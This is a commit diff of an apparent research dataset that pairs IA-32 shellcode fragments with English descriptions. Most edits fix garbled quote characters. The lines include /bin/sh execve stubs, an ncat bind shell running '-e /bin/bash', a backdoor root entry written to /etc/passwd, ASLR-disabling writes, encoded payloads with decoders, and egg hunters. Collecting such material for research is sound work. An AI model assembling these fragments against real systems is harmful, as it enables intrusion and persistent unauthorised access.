piliguori commited on
Commit
0f782af
·
1 Parent(s): 00af6aa
Files changed (1) hide show
  1. Extendend_Shellcode_IA32.tsv +125 -125
Extendend_Shellcode_IA32.tsv CHANGED
@@ -131,7 +131,7 @@ add eax, [ebp-4] add the contents of the local variable stored at ebp-4 into eax
131
  add eax, 0x10 add 0x10 to eax
132
  add eax, 0x12345678 add 0x12345678 to the contents in eax and save the result in eax
133
  add eax, 0x2d383638 add 0x2d383638 to the contents in eax and save the result in eax
134
- add eax, 0x2d383638 \n push eax push �hmod� on stack
135
  add eax, 0x31179798 add 0x31179798 to the contents in eax and save the result in eax
136
  add eax, 0x5 \n jnz L2 add 0x5 to edx and jump to L2 if the result is not 0
137
  add eax, 0x7 \n jnz L4 add the value 0x7 to eax and jump to the label L4 if the sum is not zero
@@ -288,7 +288,7 @@ call decoder \n encodedshellcode: db 0xd6,0x47,0xb7,0x9f,0xd8,0xd8,0x94, 0x9f,0x
288
  call decoder \n shellcode: db 0x18,0x38,0xc7,0x57,0x6f,0x36,0x36,0x7a,0x6f,0x6f,0x36,0x69,0x70,0x75,0x90,0xea,0x38,0xd0,0x90,0xd1,0x71,0x12,0x5f,0xd4,0x87 go to _decoder label after entering the address of the array shellcode (0x18,0x38,0xc7,0x57,0x6f,0x36,0x36,0x7a,0x6f,0x6f,0x36,0x69,0x70,0x75,0x90,0xea,0x38,0xd0,0x90,0xd1,0x71,0x12,0x5f,0xd4,0x87) on the top of the stack
289
  call decoder \n shellcode: db 0x3e,0xcd,0x5d,0x75,0x3c,0x3c,0x80,0x75,0x75,0x3c,0x6f,0x76,0x7b,0x96,0xf0,0x5d,0x96,0xef,0x60,0x96,0xee,0xbd,0x18,0xda,0x8d go to _decoder label after entering shellcode (db 0x3e,0xcd,0x5d,0x75,0x3c,0x3c,0x80,0x75,0x75,0x3c,0x6f,0x76,0x7b,0x96,0xf0,0x5d,0x96,0xef,0x60,0x96,0xee,0xbd,0x18,0xda,0x8d) address on the top of the stack
290
  call decoder \n shellcode: db 0x4b,0xf7,0x13,0x59,0xcc,0x8c,0x63,0x5e,0x9f,0x8d,0x99,0x9f,0x1f,0xa4,0x3b,0x6e,0xc6,0x36,0x23 \n shellcodelen equ $-shellcode shellcode address will be pushed into the stack
291
- call decoder \n shellcode: db 0x62,0x60,0xa0,0x34,0x5e,0x97,0xe6,0x34,0xd0,0x97,0xc4,0xb4,0xdc,0xc4,0xc7,0x28,0x13,0x71,0xa6,0xc4,0xc3,0x58,0x16,0xe6,0x01 go to _decoder label after entering shellcode 0x62,0x60,0xa0,0x34,0x5e,0x97,0xe6,0x34,0xd0,0x97,0xc4,0xb4,0xdc,0xc4,0xc7,0x28,0x13,0x71,0xa6,0xc4,0xc3,0x58,0x16,0xe6,0x01 on the top of the stack
292
  call decoder \n xor dword ptr [edx-0x55af5540],ebp xoring ebp content with the double word at the adress edx-0x55af5540 then go to decoder label
293
  call decoder_setup call decoder_setup
294
  call decoder1 \n xor_value: db 0xaa, 0xaa, 0xaa, 0xaa, 0xaa, 0xaa, 0xaa, 0xaa \n rot_value: db 13, 13, 13, 13, 13, 13, 13, 13 \n shellcode: db 0x94,0x67,0xf7,0xdf,0x96,0x96,0x2a,0xdf,0xdf,0x96,0xc5,0xdc,0xd1,0x3c,0x5a,0xf7,0x3c,0x45,0xca,0x3c,0x44,0x17,0xb2,0x70,0x27 jump to decoder1_label afetr entering xor_value, rot_value and shellcode on the top pf the stack
@@ -299,7 +299,7 @@ call esi call esi
299
  call esi call the function in esi
300
  call esp call esp
301
  call execute call the execute function
302
- "call execute \n db ""cp /bin/sh /tmp/sh�" "put db ""cp /bin/sh /tmp/sh� address on stack then jump to _esecute label"
303
  call internetreadfile call function internetreadfile
304
  call iprint call the iprint function
305
  call iprintlf call the iprintlf function
@@ -323,12 +323,12 @@ call set_argv call set_argv
323
  call set_argv call the set_argv function
324
  "call set_argv \n cmd: db ""cat /etc/passwd;echo do__ne""" "go to _set_argv label afeter entering the byte string cmd = cat /etc/passwd;echo do__ne on stack"
325
  call shell_ret call the shell_ret function
326
- call shell_ret \n db �/bin/sh� go to shell_ret label after ebtering byte string �/bin/sh� address on stack
327
  call shellcode jump to the address of shellcode_label
328
  call shellcode call the shellcode function
329
- call shellcode \n db '/proc/sys/kernel/randomize_va_space' go to _shellcode label after entering the address of the string = �/proc/sys/kernel/randomize_va_space' on the top of the stack
330
  call shellcode \n db '/proc/sys/kernel/randomize_va_spacex' go to _shellcode label after entering the byte string '/proc/sys/kernel/randomize_va_spacex' address on stack
331
- call shellcode \n db 'my.txtx' go to _shellcode label after entering the byte string �mt.txtx� address on the top of the stack
332
  "call shellcode \n message db ""/bin/sh""" push the address of /bin/sh on the top of the stack, and then change the eip to the address in shellcode_label
333
  call shellcode \n port: db 0xd4, 0x31, 0xc0, 0xa8, 0x3, 0x77 go to shellcode label after entering port: db db 0xd4, 0x31, 0xc0, 0xa8, 0x3, 0x77 address on stack
334
  call shellcode db '/usr/bin/ncat#-lvp1337#-e/bin/bash#aaaabbbbccccdddd' jump to shellcode_label after entering the byte string '/usr/bin/ncat#-lvp1337#-e/bin/bash#aaaabbbbccccdddd' on the top of the stack
@@ -723,12 +723,12 @@ db 'egg mark' initialize a string to 'egg mark'
723
  db 'egg mark' define the byte string 'egg mark'
724
  db 'my.txtx' define the byte string 'my.txtx'
725
  db 'rm -f /tmp/f' define the byte string 'rm -f /tmp/f'
726
- db 0ah define the byte string 0ah
727
- db 0b1h define the byte string 0b1h
728
- db 0b8h define the byte string 0b8h
729
- db 0c6h define the byte string 0c6h
730
- db 0d8h define the byte string 0d8h
731
- db 0e2h define the byte string 0e2h
732
  db 0x3e,0xcd,0x5d,0x75,0x3c,0x3c,0x80,0x75,0x75,0x3c,0x6f,0x76,0x7b define an array of bytes and initialize it to 0x3e,0xcd,0x5d,0x75,0x3c,0x3c,0x80,0x75,0x75,0x3c,0x6f,0x76,0x7b
733
  db 0x68 declare a byte contining 0x68
734
  db 0x68 declare a byte with no label containing the value 0x68
@@ -739,17 +739,17 @@ db 0xcd define a byte and initialize it to 0xcd
739
  db 0xcd define the byte 0xcd
740
  db 10 declare a byte with no label containing the value 10
741
  db 10 declare an unlabeled byte initialized to 10
742
- db 20h define the byte string 20h
743
- db 24h define the byte string 24h
744
- db 60h define the byte string 60h
745
- db 69h define the byte string 69h
746
- db 70h define the byte string 70h
747
- db 80h define the byte string 80h
748
- db 81h define the byte string 81h
749
- db 83h define the byte string 83h
750
- db 87h define the byte string 87h
751
- db 8bh define the byte string 8bh
752
- db 9ah define the byte string 9ah
753
  dd 0xdeadbeef define a byte and initialize it to 0xdeadbeef
754
  dd 0xdeadbeef \n dd 0xdeadbeef define double word 0xdeadbeef two times
755
  dec al \n jz shellcode decrement the al register and jump to shellcode if the result is zero
@@ -1021,7 +1021,7 @@ function_4: \n call [esp] define function_4 and call it
1021
  function_5: \n call [esp] define function_5 and execute it
1022
  fupdisasm: define fupdisasm function
1023
  fupdisasm: define fupdisasm label
1024
- fwait put cpu into a wait state until the coprocessor signals it has finished it�s operation
1025
  get_key: define _get_key label
1026
  get_shellcode_addr: get_shellcode_addr function
1027
  get: declare get_label
@@ -1758,7 +1758,7 @@ lea esi, [ebp+20] load the effective address [ebp+20] into esi
1758
  lea esi, [ebp+20] load the effective address of the result of the operation [ebp+20] into the esi register
1759
  lea esi, [edi + 8] transfer the eighth character pointed by edi to esi
1760
  lea esi, [edi +16] make esi register point to shellcode
1761
- lea esi, [edi +8] make esi point to shellcode that contains previous xor�ed results
1762
  lea esi, [esi +4] load the effective address of the result of the operation [esi +4] into the esi register
1763
  lea esi, [esi+2] load the effective address of esi+2 into esi
1764
  lea esi, [esi+4] load the effective address [esi+4] into esi
@@ -1924,7 +1924,7 @@ mov [esp + 1], cl move cl into the address [esp + 1]
1924
  mov [esp+4], esp move esp into the address [esp+4]
1925
  mov [esp+4],esp sets esp as recv buffer
1926
  mov [esp+57], al move al into the address [esp+57]
1927
- mov [esp+57],al \n mov [esp+58],ah \n mov [esp+59], ebx save into esp register the syscall command �int 0x80 and jump back to _stage
1928
  mov [esp+58], ah move ah into the address [esp+58]
1929
  mov [esp+59], ebx move ebx into the address [esp+59]
1930
  mov [var], ebx move the contents of ebx into the 4 bytes at memory address var
@@ -2283,7 +2283,7 @@ mov bl, 0xe move 0xe into bl
2283
  mov bl, 0xff store 0xff into bl register
2284
  mov bl, 0xff move 0xff into bl
2285
  mov bl, 0xff move the value 0xff into bl
2286
- mov bl, 0xff \n mov bh, 0xe2 load �jmp edx� command into ebx register
2287
  mov bl, 1 load socket = 1 into bl register
2288
  mov bl, 1 move 1 into bl
2289
  mov bl, 10 store 10 into bl register
@@ -2499,7 +2499,7 @@ mov cx, 02001 move 02001 into cx
2499
  mov cx, 0666 move 0666 into cx
2500
  mov cx, 0700 move 0700 into cx
2501
  mov cx, 0x191 move 0x191 into cx
2502
- mov cx, 0x1ff store hexadecimal value of 777 in cx
2503
  mov cx, 0x1ff load hexadecimal value 0x1ff into cx register
2504
  mov cx, 0x1ff move 0x1ff into cx
2505
  mov cx, 0x2bc move 0x2bc into cx
@@ -2620,9 +2620,9 @@ mov dx, 132 move the deciaml value 132 in dx register
2620
  mov dx, 132 move 132 into dx
2621
  mov dx, 16666 move 16666 into dx
2622
  mov dx,0x2a1 put 673 in dx
2623
- mov dx,0x3a30 load �:0 into dx register
2624
  mov dx,0xb01 move the hexadecimal value 0xb01 to dx register
2625
- mov eax, _start set a valid .text address, _start into eax
2626
  mov eax, _start move _start into eax
2627
  mov eax, [ebp+8] move value of memory address [ebp+8] into eax
2628
  mov eax, [ebx] move the 4 bytes in memory at the address contained in ebx into eax
@@ -2654,7 +2654,7 @@ mov eax, 0x5 move 5 into eax
2654
  mov eax, 0x50905090 store egg (0x50905090) in eax
2655
  mov eax, 0x50905090 move 0x50905090 into eax
2656
  mov eax, 0x563ed8b7 move 0x563ed8b7 into eax
2657
- mov eax, 0x563ed8b7 \n add eax, 0x12345678 \n push eax push �//sh� on stack
2658
  mov eax, 0x66 move 0x66 into eax
2659
  mov eax, 0x6c6c756e move 0x6c6c756e into eax
2660
  mov eax, 0x782f2f move 0x782f2f into eax
@@ -2665,7 +2665,7 @@ mov eax, 0x969d8cd0 move 0x969d8cd0 into eax
2665
  mov eax, 0x9a8dd091 move 0x9a8dd091 into eax
2666
  mov eax, 0xb33fb33f move 0xb33fb33f into eax
2667
  mov eax, 0xdeadc0de move 0xdeadc0de into eax
2668
- mov eax, 0xdeadc0de \n sub eax, 0x70445eaf \n push eax push �/bin� on stack
2669
  mov eax, 0xfeffff80 copy hexadecimal value 0xfeffff80 into eax register
2670
  mov eax, 0xfeffff80 move 0xfeffff80 into eax
2671
  mov eax, 0xffffffff move 0xffffffff into eax
@@ -2893,7 +2893,7 @@ mov ebx, 5 move 5 into ebx
2893
  mov ebx, 9 move number 9 into ebx
2894
  mov ebx, buff move buff to ebx
2895
  mov ebx, command move command into ebx
2896
- mov ebx, dword 0x5090508f save egg signature altered: 0x50905090 1 into ebx
2897
  mov ebx, dword 0x5090508f move dword 0x5090508f into ebx
2898
  mov ebx, dword 0x50905091 move dword 0x50905091 into ebx
2899
  mov ebx, dword 0x50905091 \n dec ebx load hexadecimal value 0x50905091 as a double word into ebx register then decrement its content by 1
@@ -2922,7 +2922,7 @@ mov ebx, esi save the saved socket descpritor in ebx
2922
  mov ebx, esi save the esi contenmts in ebx register
2923
  mov ebx, esi store address of /usr/bin/ncat into ebx register
2924
  mov ebx, esi copy esi content into ebx register
2925
- mov ebx, esi load arg1 = �/bin/sh� into ebx register
2926
  mov ebx, esi save esi content into ebx
2927
  mov ebx, esi move esi into ebx
2928
  mov ebx, esp push /bin/sh into ebx
@@ -2947,7 +2947,7 @@ mov ebx, esp ebx points the top of the stack
2947
  mov ebx, esp ebx point to pushed string
2948
  mov ebx, esp move stack ptr to ebx
2949
  mov ebx, esp "moving the pointer to ""/bin//sh"" to ebx"
2950
- mov ebx, esp moving the pointer to the string �/bin//cn� to ebx
2951
  mov ebx, esp moves the memory address of esp(pointing to our string & nulls) from the stack into ebx
2952
  mov ebx, esp save esp content into ebx
2953
  mov ebx, esp save esp content into ebx register
@@ -3004,7 +3004,7 @@ mov ecx, 0x0 move 0x0 into ecx
3004
  mov ecx, 0x04030382 mov ip address in ecx
3005
  mov ecx, 0x1 move 0x1 into ecx
3006
  mov ecx, 0x88998899 move 0x88998899 into ecx
3007
- mov ecx, 0x88998899 \n sub ecx, 0x1525152a \n push ecx push �osts� on stack
3008
  mov ecx, 1 move 1 into ecx
3009
  mov ecx, 36 get 36 in the ecx
3010
  mov ecx, 4294948047 move 4294948047 into ecx
@@ -3154,7 +3154,7 @@ mov edi, 0x6e69622f push /bin in edi
3154
  mov edi, 0x978cd092 move 0x978cd092 into edi
3155
  mov edi, 0x978cd092 \n mov ebx, edi load hexadecimal value 0x978cd092 into edi and ebx registers
3156
  mov edi, 0x978cd0d0 move 0x978cd0d0 into edi
3157
- mov edi, 0x978cd0d0 \n mov esi, 0x91969dd0 \n not edi \n not esi \n push edi \n push esi push �/bin//sh on stack�
3158
  mov edi, 0xaaaa9090 move 0xaaaa9090 to edi
3159
  mov edi, 0xada67373 trtasfer the hexadecimal value 0xada67373 into edi register
3160
  mov edi, 0xada67373 move 0xada67373 into edi
@@ -3177,7 +3177,7 @@ mov edi, esi move the pointer to the shellcode into edi
3177
  mov edi, esp load esp content in edi register
3178
  mov edi, esp save addr of stack into edi
3179
  mov edi, esp edi points to the top of the stack
3180
- mov edi, esp moving the pointer to the string �-le//bin//sh� to edi
3181
  mov edi, esp move esp into edi
3182
  mov edi, hexstr place hexstr into edi
3183
  mov edi,0x3734b117 move hexadecimal value 0x3734b117 into edi content
@@ -3212,7 +3212,7 @@ mov edx, 9 move number 9 into edx
3212
  mov edx, buff move buff to edx
3213
  mov edx, bufflen move bufflen into edx
3214
  mov edx, donelen move donelen into edx
3215
- mov edx, dword 0x65676760 save �egg� into edx register
3216
  mov edx, dword 0x65676760 move dword 0x65676760 into edx
3217
  mov edx, dword 0x65676760 move the doubleword 0x65676760 into edx
3218
  mov edx, eatlen move eatlen into edx
@@ -3253,7 +3253,7 @@ mov edx, response move address of response variable into edx
3253
  mov edx, src move the contents of src variable into edx
3254
  mov edx, tmp move the contents of tmp variable into edx
3255
  mov edx, type var1 move the number of bytes of var1 into edx
3256
- mov edx,0x4f904790 copy the hexadecimal value of �.g.o� into ed register
3257
  mov edx,eax copy eax content into edx register
3258
  mov edx,esp load the stack pointer into edx register
3259
  mov edx,esp load esp cpntent into edx register
@@ -3295,13 +3295,13 @@ mov esi, eax \n xor eax, eax copy socket des from eax to esi register then clear
3295
  mov esi, ecx copy ecx into esi register
3296
  mov esi, ecx move ecx into esi
3297
  mov esi, edx move remainder into esi
3298
- mov esi, esp load in esi the pointer to �-f� argument
3299
  mov esi, esp load esp contents on esi register
3300
  mov esi, esp load the the stack pointer in esi register
3301
  mov esi, esp load esp content in esi regsister
3302
  mov esi, esp save addr of stack into esi
3303
  mov esi, esp save the name of the file into esi register
3304
- mov esi, esp moving the pointer to �-vp13337�to esi
3305
  mov esi, esp save esp content into esi register
3306
  mov esi, esp move esp into esi
3307
  mov esi, v move v to esi
@@ -3503,8 +3503,8 @@ pop ebx pick up ebx from stack
3503
  pop ebx pop stack(2 = sys_bind = bind()) into ebx
3504
  pop ebx load string into rbx register
3505
  pop ebx set sys_bind = 2
3506
- pop ebx save the string /bin/sh� into ebx
3507
- pop ebx save the byte string �mt.txtx� into ebx register
3508
  pop ebx save th byte string '/proc/sys/kernel/randomize_va_spacex' into ebx register
3509
  pop ebx restore ebx from the value we pushed onto the stack at the start
3510
  pop ebx restore the original value of ebx
@@ -3619,7 +3619,7 @@ push '//sh' push '//sh' onto the stack
3619
  push '/bin' push '/bin' onto the stack
3620
  push '/etc' push '/etc' onto the stack
3621
  push 'sswd' push 'sswd' onto the stack
3622
- "push ""sswd"" \n push ""//pa"" \n push ""/etc""" push �/etc//passwd� on stack
3623
  push [tmp] push the 4 bytes at address tmp onto stack
3624
  push [var] push the 4 bytes at address var onto the stack
3625
  push [var2] push the 4 bytes at address var2 onto the stack
@@ -3627,7 +3627,7 @@ push 0bh push 0bh onto the stack
3627
  push 0x0 push the value 0x0 to the stack
3628
  push 0x0 push 0x0 onto the stack
3629
  push 0x0 \n push ecx \n push ebx push the value 0x0, ecx and ebx contents on stack
3630
- push 0x0 \n push ecx \n push ebx \n mov ecx,esp load �/bin/cat/etc//paswd\0 into ex register
3631
  push 0x0068732f \n push 0x6e69622f \n mov ebx, esp save /bin/sh in the first free 32bit register
3632
  push 0x0101017f \n push word 0x5c11 \n push word 0x02 \n mov ecx, esp save the address 127.1.1.1, the value on 32bit 4444 and af_inet represented in 32bit on ecx register
3633
  push 0x04020a0a push ip adress 0x04020a0a
@@ -3635,7 +3635,7 @@ push 0x04020a0a push 0x04020a0a onto the stack
3635
  push 0x0a206873 push 0x0a206873 onto the stack
3636
  push 0x0a206873 \n push 0x2f6e6962 \n push 0x2f3a706d \n push 0x742f3a31 \n push 0x3131313a \n push 0x31313131 \n push 0x3a30754a \n push 0x4c5a304b \n push 0x45683933 \n push 0x78534a52 \n push 0x50446862 \n push 0x73644d24 \n push 0x67513231 \n push 0x3458652e \n push 0x2431243a \n push 0x64687373 \n mov ebp, esp load the string sshd:$1$.ex412qg$mdsbhdprjsx39hek0zlju0:1111:1111:/tmp:/bin/sh on ebp register
3637
  push 0x0a3a7964 push 0x0a3a7964 onto the stack
3638
- push 0x0a3a7964 \n push 0x72706475 \n mov edx, esp load �udprdy:� into edx register
3639
  push 0x0a4c4c41 push the value 0x0a4c4c41 onto the stack
3640
  push 0x0a4c4c41 push 0x0a4c4c41 onto the stack
3641
  push 0x0b \n pop eax insert the hexadecimal value 11 on the stack and save it in the first free 32bit register
@@ -3734,7 +3734,7 @@ push 0x30 push the value 0x30 onto the stack
3734
  push 0x30 \n pop eax push 48 on the stack and put this value in eax, taking it from the stack
3735
  push 0x30313a31 push 0x30313a31 to the stack
3736
  push 0x30313a31 push 0x30313a31 onto the stack
3737
- push 0x30313a31 \n push 0x2e312e31 \n push 0x2e373231 \n mov esi, esp \n push eax \n push 0x79616c70 \n push 0x7369642d \n mov edi,esp \n push eax \n push 0x6d726574 \n push 0x782f6e69 \n push 0x622f7273 \n push 0x752f2f2f \n mov ebx,esp \n push eax \n push esi \n push edi \n push ebx push on stack the listening ip 127.1.1.1:10 and save it into esi register then push null and �- display� command and save it in edi register. subsequently push null and the string �///usr/bin/xterm� and save it into ebx register. in the end push eax, esi, edi and ebx on sta stack.
3738
  push 0x30317974 push 0x30317974 onto the stack
3739
  push 0x30317974 push the 0x30317974 onto the stack
3740
  push 0x31313131 push 0x31313131 onto the stack
@@ -3747,12 +3747,12 @@ push 0x3170762d push the 0x3170762d onto the stack
3747
  push 0x32322e32 push 0x32322e32 onto the stack
3748
  push 0x32322e32 push 0x32322e32 to the stack
3749
  push 0x3458652e push 0x3458652e onto the stack
3750
- push 0x37333333 \n push 0x3170762d push �-vp13337 on stack
3751
  push 0x37373333 push 0x37373333 to the stack
3752
  push 0x37373333 push the 0x37373333 onto the stack
3753
  push 0x37373333 push 0x37373333 onto the stack
3754
  push 0x3a303a3a push 0x3a303a3a onto the stack
3755
- push 0x3a303a3a \n push 0x74303072 push r00t::0:� on stack
3756
  push 0x3a30754a push 0x3a30754a onto the stack
3757
  push 0x3a3a3a30 \n push esi push :::0 and esi content on stack
3758
  push 0x3d4c4c41 push the value 0x3d4c4c41 onto the stack
@@ -3783,7 +3783,7 @@ push 0x5 \n pop eax load ope syscall number into eax register
3783
  push 0x50446862 push 0x50446862 onto the stack
3784
  push 0x53534150 push the 0x53534150 onto the stack
3785
  push 0x53534150 push 0x53534150 onto the stack
3786
- push 0x5f657a69 push _ezi on stack
3787
  push 0x6 push ipproto_tcp value, 6, on stack
3788
  push 0x6 push protocol ipv6 value, 6, on stack
3789
  push 0x6 push 0x6 onto the stack
@@ -3796,10 +3796,10 @@ push 0x61655220 push 0x61655220 onto the stack
3796
  push 0x6168732f push 0x6168732f onto the stack
3797
  push 0x6168732f push 0x6168732f to the stack
3798
  push 0x6168732f push the value 0x6168732f onto the stack
3799
- push 0x6168732f \n push 0x6374652f push �/etc/sha� on stack
3800
  push 0x6168732f \n push 0x6374652f \n mov ebx, esp push the value 0x6168732f and the value 0x6374652f onto the stack and point the ebx register to the stack register
3801
  push 0x61702f2f push 0x61702f2f onto the stack
3802
- push 0x61702f2f \n push 0x13371337 \n push 0x64777373 \n push 0x6374652f push �/etcsswd7.7.//pa� on stack
3803
  push 0x61702f2f \n push 0x6374652f \n mov eax, esp push the value 0x61702f2f and the value 0x6374652f onto the stack and point the eax register to the stack register
3804
  push 0x61702f2f \n push 0x6374652f \n mov ebx, esp push the value 0x61702f2f and the value 0x6374652f onto the stack and point the ebx register to the stack register
3805
  push 0x61702f2f \n push 0x6374652f \n mov ecx, esp push the value 0x61702f2f and the value 0x6374652f onto the stack and point the ecx register to the stack register
@@ -3808,14 +3808,14 @@ push 0x61702f2f \n push 0x6374652f \n mov edx, esp push the value 0x61702f2f and
3808
  push 0x61702f2f \n push 0x6374652f \n mov esi, esp push the value 0x61702f2f and the value 0x6374652f onto the stack and point the esi register to the stack register
3809
  push 0x61702f63 push the 0x61702f63 onto the stack
3810
  push 0x61702f63 push 0x61702f63 onto the stack
3811
- push 0x61722f6c push �ar/l� on satck
3812
  push 0x622f7273 push 0x622f7273 onto the stack
3813
  push 0x622f7273 push 0x622f7273 to the stack
3814
  push 0x636e2f2f push 0x636e2f2f onto the stack
3815
  push 0x636e2f2f push 0x636e2f2f to the stack
3816
  push 0x636e2f2f push the 0x636e2f2f onto the stack
3817
- push 0x636e2f2f \n push 0x6e69622f push /bin//cn� on stack
3818
- push 0x636e2f2f \n push 0x6e69622f push the string �/bin//cn� on stack
3819
  push 0x6374652f push 0x6374652f onto the stack
3820
  push 0x6374652f push 0x6374652f to the stack
3821
  push 0x6374652f push the 0x6374652f onto the stack
@@ -3847,16 +3847,16 @@ push 0x64777373 push the 0x64777373 onto the stack
3847
  push 0x64777373 push 0x64777373 onto the stack
3848
  push 0x64777373 \n push 0x61702f63 \n push 0x74652f2f \n mov ebx, esp push the path //etc/passwd on the stack and load stack pointer to ebx
3849
  push 0x64777373 \n push 0x61702f63 \n push 0x74652f2f \n xor ebx, ebp \n lea ebx, [esp] push the path //etc/passwd on the stack and load stack pointer to ebx
3850
- push 0x65636170 push �ecap� on stack
3851
  push 0x6567772f push 0x6567772f onto the stack
3852
  push 0x6567772f push 0x6567772f to the stack
3853
  push 0x656c6966 push 0x656c6966 onto the stack
3854
  push 0x656c6966 push the 0x656c6966 onto the stack
3855
- push 0x656e7265 push �enre� label on stack
3856
  push 0x65726f43 push 0x65726f43 onto the stack
3857
  push 0x65782e2f push 0x65782e2f onto the stack
3858
  push 0x65782e2f push 0x65782e2f to the stack
3859
- push 0x65782e2f \n push 0x706d742f push the name of file to be executed = �/tmp/.xe�
3860
  push 0x66 push 0x66 onto the stack
3861
  push 0x66 push 0x66 to the stack
3862
  push 0x66 push the 0x66 onto the stack
@@ -3870,20 +3870,20 @@ push 0x682f2f2f push 0x682f2f2f onto the stack
3870
  push 0x682f2f2f push the 0x682f2f2f value onto the stack
3871
  push 0x68732f2f push ascii sh// onto stack
3872
  push 0x68732f2f push hs// string on stack
3873
- push 0x68732f2f push �//sh� on stack
3874
  push 0x68732f2f push //sh to the stack
3875
  push 0x68732f2f push hs//
3876
  push 0x68732f2f push the 0x68732f2f value onto the stack
3877
  push 0x68732f2f push the value 0x68732f2f onto the stack
3878
  push 0x68732f2f push 0x68732f2f to the stack
3879
  push 0x68732f2f push 0x68732f2f onto the stack
3880
- push 0x68732f2f \n push 0x68732f2f \n push 0x2f656c2d push -le///sh//sh� on stack
3881
  push 0x68732f2f \n push 0x6e69622f push /bin//sh
3882
- push 0x68732f2f \n push 0x6e69622f push �/bin//sh� on stack
3883
- push 0x68732f2f \n push 0x6e69622f push the string �/bin//sh� on stack
3884
- push 0x68732f2f \n push 0x6e69622f push �/bin//sh� on stack
3885
- push 0x68732f2f \n push 0x6e69622f push the string /bin//sh� on stack
3886
- push 0x68732f2f \n push 0x6e69622f push �/bin//sh� string on stack
3887
  push 0x68732f2f \n push 0x6e69622f \n mov eax, esp push /bin/sh onto the stack and point the eax register to the stack register
3888
  push 0x68732f2f \n push 0x6e69622f \n mov eax, esp move /bin/sh into eax
3889
  push 0x68732f2f \n push 0x6e69622f \n mov eax, esp put ASCII /bin/sh into eax
@@ -3898,9 +3898,9 @@ push 0x68732f2f \n push 0x6e69622f \n mov ebx, esp put /bin/sh into ebx
3898
  push 0x68732f2f \n push 0x6e69622f \n mov ebx, esp move ASCII /bin/sh into ebx
3899
  push 0x68732f2f \n push 0x6e69622f \n mov ebx, esp move /bin/sh into the ebx register
3900
  push 0x68732f2f \n push 0x6e69622f \n mov ebx,esp load the string /bin//sh on ebx register
3901
- push 0x68732f2f \n push 0x6e69622f \n mov ebx,esp make ebx pointing to the string �/bin//sh�
3902
- push 0x68732f2f \n push 0x6e69622f \n mov ebx,esp load the string �/bin//sh� into ebx regsiter
3903
- push 0x68732f2f \n push 0x6e69622f \n mov ebx,esp load �/bin//sh\0 into ebx register
3904
  push 0x68732f2f \n push 0x6e69622f \n mov ecx, esp move ASCII /bin/sh into ecx
3905
  push 0x68732f2f \n push 0x6e69622f \n mov ecx, esp move /bin/sh into the ecx register
3906
  push 0x68732f2f \n push 0x6e69622f \n mov ecx, esp push /bin/sh onto the stack and point the ecx register to the stack register
@@ -3909,8 +3909,8 @@ push 0x68732f2f \n push 0x6e69622f \n mov edx, esp push ASCII /bin/sh onto the s
3909
  push 0x68732f2f \n push 0x6e69622f \n mov edx, esp put /bin/sh into edx
3910
  push 0x68732f2f \n push 0x6e69622f \n mov edx, esp move ASCII /bin/sh into edx
3911
  push 0x68732f2f \n push 0x6e69622f \n mov edx, esp move /bin/sh into the edx register
3912
- push 0x68732f2f \n push 0x6e69622f \n push 0x2f656c2d push the string �-le//bin//sh� on stack
3913
- push 0x68732f6e push �hs/b�
3914
  push 0x68732f6e push the 0x68732f6e onto the stack
3915
  push 0x68732f6e push 0x68732f6e to the stack
3916
  push 0x68732f6e push 0x68732f6e onto the stack
@@ -3920,9 +3920,9 @@ push 0x68732f6e \n push 0x69622f2f \n mov ebx, esp load the string //bin/sh on t
3920
  push 0x68735858 push the value 0x68735858 onto the stack
3921
  push 0x68736162 push 0x68736162 to the stack
3922
  push 0x68736162 push 0x68736162 onto the stack
3923
- push 0x68736162 \n push 0x2f6e6962 \n push 0x2f2f2f2f push the string �////bin/bash� on stack
3924
- push 0x68736162 \n push 0x2f6e6962 \n push 0x2f2f2f2f push �////bin/bash� into the stack
3925
- push 0x68736162 \n push 0x2f6e6962 \n push 0x2f2f2f2f push the string �////bin/bash� onto the stack
3926
  push 0x68736164 push 'hsad' on stack
3927
  push 0x68736164 push 0x68736164 to the stack
3928
  push 0x68736164 push 0x68736164 onto the stack
@@ -3936,10 +3936,10 @@ push 0x6873732f \n push 0x6374652f \n mov edx, esp push the value 0x6873732f and
3936
  push 0x6873732f \n push 0x6374652f \n mov esi, esp push the value 0x6873732f and the value 0x6374652f onto the stack and point the esi register to the stack register
3937
  push 0x68737a2f push hsz/ on stack
3938
  push 0x68737a2f push 0x68737a2f onto the stack
3939
- push 0x68737a2f \n push 0x6e69622f push the string �/bin/zsh� on stack
3940
  push 0x68909090 \n pop eax load hexadecimal value 0x68909090 into eax
3941
  push 0x69616863 push the 0x69616863 onto the stack
3942
- push 0x69622f2f push �ib//�
3943
  push 0x69622f2f push the 0x69622f2f onto the stack
3944
  push 0x69622f2f push 0x69622f2f to the stack
3945
  push 0x69622f2f push 0x69622f2f onto the stack
@@ -3953,17 +3953,17 @@ push 0x69622f65 push 0x69622f65 to the stack
3953
  push 0x69622f65 push the 0x69622f65 onto the stack
3954
  push 0x6962732f push 0x6962732f onto the stack
3955
  push 0x6962732f push the 0x6962732f onto the stack
3956
- push 0x6b2f7379 push �k/st� label
3957
  push 0x6c626174 push 0x6c626174 onto the stack
3958
  push 0x6d6f632e \n push 0x656c676f \n push 0x6f672031 \n push 0x2e312e31 \n push 0x2e373231 push the address 127.1.1.1 google.com on stack
3959
- push 0x6d6f646e push �modn� on stack
3960
  push 0x6d722f2f push the 0x6d722f2f onto the stack
3961
  push 0x6d726574 push 0x6d726574 onto the stack
3962
  push 0x6d726574 push 0x6d726574 to the stack
3963
  push 0x6e push the 0x6e onto the stack
3964
  push 0x6e69622f push ascii nib/ onto stack
3965
  push 0x6e69622f push nib/ string on stack
3966
- push 0x6e69622f push �/bin� on stack
3967
  push 0x6e69622f push nib/ on stack
3968
  push 0x6e69622f push /bin to the stack
3969
  push 0x6e69622f push 0x6e69622f onto the stack
@@ -3990,12 +3990,12 @@ push 0x706d742f push 0x706d742f onto the stack
3990
  push 0x706d742f push 0x706d742f to the stack
3991
  push 0x706d742f push the 0x706d742f onto the stack
3992
  push 0x7268732f push 0x7268732f onto the stack
3993
- push 0x72702f2f push �rp//� on stack
3994
  push 0x72706475 push 0x72706475 onto the stack
3995
  push 0x7273752f push 0x7273752f onto the stack
3996
  push 0x7273752f push 0x7273752f to the stack
3997
- push 0x732f636f push �s/co� on stack
3998
- push 0x735f6176 push s_av on stack
3999
  push 0x7361702f push 0x7361702f to the stack
4000
  push 0x7361702f push 0x7361702f onto the stack
4001
  push 0x73644d24 push 0x73644d24 onto the stack
@@ -4004,8 +4004,8 @@ push 0x7369642d push 0x7369642d onto the stack
4004
